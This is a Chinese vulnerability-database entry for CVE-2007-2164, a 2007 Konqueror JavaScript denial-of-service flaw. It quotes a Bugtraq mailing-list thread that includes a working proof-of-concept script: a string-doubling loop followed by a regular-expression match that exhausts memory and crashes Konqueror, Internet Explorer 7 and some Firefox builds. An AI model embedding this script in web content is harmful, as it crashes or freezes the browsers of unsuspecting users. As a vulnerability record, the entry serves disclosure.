Konqueror JavaScript拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190895 漏洞类型 未知
发布时间 2007-04-22 更新时间 2007-04-22
CVE编号 CVE-2007-2164 CNNVD-ID CNNVD-200704-399
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/86284
https://cxsecurity.com/issue/WLB-2007040107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-399
|漏洞详情
Konqueror是KDE桌面系统的一部分,主要用于Linux和BSD家族的操作系统。Konqueror允许远程攻击者借助JavaScript,引起拒绝服务攻击(浏览器崩溃)。该JavaScript会配对正则表达式来对抗长字符串(可以用/(.)*/代替)。
|漏洞EXP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nope.  Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it
didn't even flinch.  No OOM-killing here.

On the other hand, Konqueror 3.5.5 "release 45.4" churned swap madly for
about five minutes (the machine continued to run well enough if just a
bit slower) until Konq sig-sixed itself.

Cheers

The Anarcat wrote:
> Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
> rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
> 
> I would think that Firefox and most browsers implementing javascript
> would die an horrible OOM death on this.
> 
> A.
> 
> On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
> 
> 
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
> 
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
> 
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
> 
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
> 
> V. Code
> 
> $ more /stupidInternetExploder.html
> 
> <script>
> 
> var reg = /(.)*/;
> 
> var z = 'Z';
>                while (z.length <= 
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999) z+=z;
>        var boum = reg.exec(z);
> 
> </script>
> 
> Goodbye
> 
> 
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net 
> 
> The happiness of society is the end of government.
> John Adams
> 
> 
>>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX
N1X/wJSO4U4Sx3z5Yn0S6Tk=
=T/tc
-----END PGP SIGNATURE-----
|受影响的产品
KDE Konqueror 3.5.5
|参考资料

来源:BUGTRAQ
名称:20070417Re:InternetExplorerCrash
链接:http://www.securityfocus.com/archive/1/archive/1/466147/100/0/threaded
来源:BUGTRAQ
名称:20070417InternetExplorerCrash
链接:http://www.securityfocus.com/archive/1/archive/1/466017/100/0/threaded
来源:SREASON
名称:2600
链接:http://securityreason.com/securityalert/2600